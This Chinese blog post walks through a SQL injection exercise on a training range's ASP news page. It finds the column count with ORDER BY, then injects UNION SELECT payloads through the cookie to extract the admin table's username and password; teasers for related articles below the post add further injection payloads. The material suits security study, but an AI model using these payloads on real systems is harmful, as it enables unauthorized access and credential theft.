前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >SQL注入实战(二)

SQL注入实战(二)

作者头像
木尤
发布于 2020-07-14 07:29:02
发布于 2020-07-14 07:29:02
4640
举报
文章被收录于专栏:我的csdn我的csdn

封神台靶场

https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb

1.打开网站,打开一篇新闻

http://59.63.200.79:8004/shownews.asp?id=171

2.看下能不能用带参数注入,在后面加个单引号,网页提示传参错误
3.现在试试有几个字段

测试后发现 http://59.63.200.79:8004/shownews.asp?id=171 order by 10 order by 10页面显示正常,但是当用orderby11时显示数据库错误

4.先试试burp抓包

抓包发现存在cookice 用modheader

5.试试提交cookice

id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin 所有的字段显示出来,说明存在admin

6.接着在cookice里面设置

id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020/07/10 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
cookie注入的三种方法(靶场实例绕过WAF)
♦要进行cookie注入,我们首先就要修改cookie,这里就需要使用到Javascript语言了。另外cookie注入的形成有两个必须条件:
字节脉搏实验室
2020/05/14
8.3K0
SQL注入实战(一)
封神台靶场 https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 查找注入点: sqlmap.py -u http://59.63.200.79
木尤
2020/07/14
4620
SQL注入绕过(第二弹)
1.还是找规律 order不拦截,orderby组合在一起就会被拦截。这里我正好想到上次bypass一个报错注入的手法,就是一个简单的换行,这里要是不懂。可以去学下数据库噻
Power7089
2020/07/27
6710
SQL注入绕过(第二弹)
sql注入技术大总结
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema =database()# 从所有的表里边找到这个库名里不重复的表名
黑战士
2024/04/13
3080
Access-SQL手工注入实战
经过反复尝试,这里可以利用“+”替换空格和大写字母绕过WTS-WAF,并且此waf没有过滤and。
HACK学习
2019/08/05
1.6K0
渗透测试系统学习-Day11&数据库注入靶场Day1Cookie注入
前言: 这里又是新的一章,关于数据库注入,前面讲的是SQL注入,这里是数据库注入,这方面我也没有系统的学习过,借助这次靶场的机会,好好规整规整知识路线。
Baige
2022/03/22
4230
渗透测试系统学习-Day11&数据库注入靶场Day1Cookie注入
SQL注入攻击与防御
在动态网站中,往往需要用户传递参数到服务器,这些参数往往需要和数据库进行交互;当服务端没有对参数进行安全过滤时,攻击者在参数中加入恶意的SQL语句结构,便编造成了SQL注入漏洞.
婷婷的橙子
2020/11/02
7.9K0
SQL注入攻击与防御
手工sql注入的总结
时间盲注主要涉及三个函数,if、substr、sleep,有的时候可根据情况加上ascii进行编码猜解。
网e渗透安全部
2023/02/25
9560
手工sql注入的总结
复习 - SQL注入
场景:网站A无注入点,网站B存在MySQL注入,且网站AB使用同一数据库。此时可利用网站B的注入点跨库查询获取网站A的数据。
Naraku
2021/07/28
1K0
cisp-pte学习笔记之SQL注入(一)
1、web页面与数据库存在交互点 2、能否写入任意的sql语句到数据库中执行并返回结果
cultureSun
2023/07/08
5700
Pikachu靶场-SQL注入-数字型注入(post)过关步骤
通过看这关的名称,就知道它的参数是数字并且提交方式是 post 提交,那么就需要burp这种工具来抓包修改注入了
用户9006224
2022/12/21
1.2K0
Pikachu靶场-SQL注入-数字型注入(post)过关步骤
SQL注入靶场-Day1
前面学习渗透测试Day6的时候,学习了SQL注入原理,于是相应的靶场也就随之而来,这里继续记录剩下的靶场练习WP
Baige
2022/03/21
6270
SQL注入靶场-Day1
SQL注入从入门到进阶
本文章产生的缘由是因为专业老师,让我给本专业的同学讲一哈SQL注入和XSS入门,也就是本文的入门篇,讲完两节课后,发现自己对于SQL注入的理解也就仅仅局限于入门,于是有了进阶章节的产生。
小简
2022/12/29
4K0
SQL注入从入门到进阶
墨者 - SQL注入
靶场地址:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe
Naraku
2021/07/29
7460
墨者 - SQL注入
SQL注入靶场Day4 宽字节注入
mysql支持16进制输入,16进制输入可以替代字符从而避免了单引号的加入 user 16进制得到:75736572
Baige
2022/03/22
7071
SQL注入靶场Day4 宽字节注入
[红日安全]Web安全Day1 - SQL注入实战攻防
大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Python靶场基本上三种靶场全部涵盖)-实战演练(主要选择相应CMS或者是Vulnhub进行实战演练),如果对大家有帮助请Star鼓励我们创作更好文章。如果你愿意加入我们,一起完善这个项目,欢迎通过邮件形式联系我们。
红日安全
2020/02/17
1.9K0
Burp Suite安全SQL注入测试
http://example.com?id=1 AND 1=CAST((SELECT version()) AS NCHAR(100))
徐攀棒
2025/03/27
3690
CTF实战8 SQL注入漏洞
我们还是那句话先 重要声明 该培训中提及的技术只适用于合法CTF比赛和有合法授权的渗透测试,请勿用于其他非法用途,如用作其他非法用途与本文作者无关
用户1631416
2018/07/25
1.7K0
WEB系列(1)—SQL注入(上)
是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
山深有杏
2024/01/30
2660
WEB系列(1)—SQL注入(上)
SQL注入靶场Day3 布尔盲注&延时注入
得知表的字段数为6,现在继续Burp去挨个爆破: 先构造一个爆破字段的payload:
Baige
2022/03/21
1.2K0
SQL注入靶场Day3 布尔盲注&延时注入
相关推荐
cookie注入的三种方法(靶场实例绕过WAF)
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档